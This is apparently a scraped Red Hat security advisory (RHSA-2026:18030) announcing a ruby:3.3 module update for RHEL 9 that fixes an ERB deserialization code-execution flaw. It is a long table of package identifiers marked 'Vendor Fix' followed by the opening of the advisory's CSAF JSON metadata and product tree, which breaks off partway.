fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3 | — |
Vendor Fix
fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for the ruby:3.3 module is now available for Red Hat Enterprise Linux 9.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks.\n\nSecurity Fix(es):\n\n* erb: ERB: Arbitrary code execution via deserialization bypass (CVE-2026-41316)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:18030",
"url": "https://access.redhat.com/errata/RHSA-2026:18030"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2461369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461369"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_18030.json"
}
],
"title": "Red Hat Security Advisory: ruby:3.3 security update",
"tracking": {
"current_release_date": "2026-05-18T14:18:21+00:00",
"generator": {
"date": "2026-05-18T14:18:21+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:18030",
"initial_release_date": "2026-05-18T13:12:43+00:00",
"revision_history": [
{
"date": "2026-05-18T13:12:43+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-05-18T13:12:43+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-18T14:18:21+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product": {
"name": "Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:enterprise_linux:9::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686 (ruby:3.3)",
"product_id": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=i686\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"product": {
